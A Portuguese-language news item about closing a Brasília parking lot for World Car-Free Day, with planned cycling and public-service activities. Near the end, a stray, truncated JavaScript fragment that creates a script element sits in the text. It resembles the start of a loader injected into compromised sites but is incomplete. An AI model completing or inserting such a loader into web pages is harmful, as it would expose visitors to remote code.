Estacionamento do Setor Comercial Sul será fechado na quinta-feira

Setor Comercial Sul-Toninho Tavares-Agência Brasília
Cerca de 150 mil pessoas circulam diariamente pelo Setor Comercial Sul, segundo a Secretaria de Mobilidade. Foto: Toninho Tavares/Agência Brasília

Na próxima quinta-feira (22), o estacionamento da Quadra 6 do Setor Comercial Sul, próximo à via W3, ficará fechado para o Dia Mundial sem Carro. O espaço, que contém cerca de 150 vagas, será reservado, das 7h às 22h, para uma série de atividades, como oficinas para ciclistas, empréstimo de bicicletas e apresentações tecnológicas. 

O objetivo, segundo o secretário de Mobilidade, Fábio Damasceno, é estimular a reflexão sobre o uso excessivo do automóvel. “Queremos incentivar o uso do transporte coletivo e da mobilidade ativa”, disse, ao explicar que mobilidade ativa se trata da que é feita pela própria pessoa, como andar de bicicleta ou a pé.

O Setor Comercial Sul é uma das áreas mais movimentadas do DF, por onde circulam, segundo a Secretaria de Mobilidade, aproximadamente 150 mil pessoas por dia.

O local ainda terá atrações da Quinta Cultural, com food trucks e apresentações artísticas, estandes com serviços das Secretarias de Saúde e do Trabalho, Desenvolvimento Social, Mulheres, Igualdade Racial e Direitos Humanos, do Departamento de Trânsito (Detran-DF) e do Departamento de Estradas de Rodagem (DER-DF), além de uma área para a ouvidoria do governo de Brasília.

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário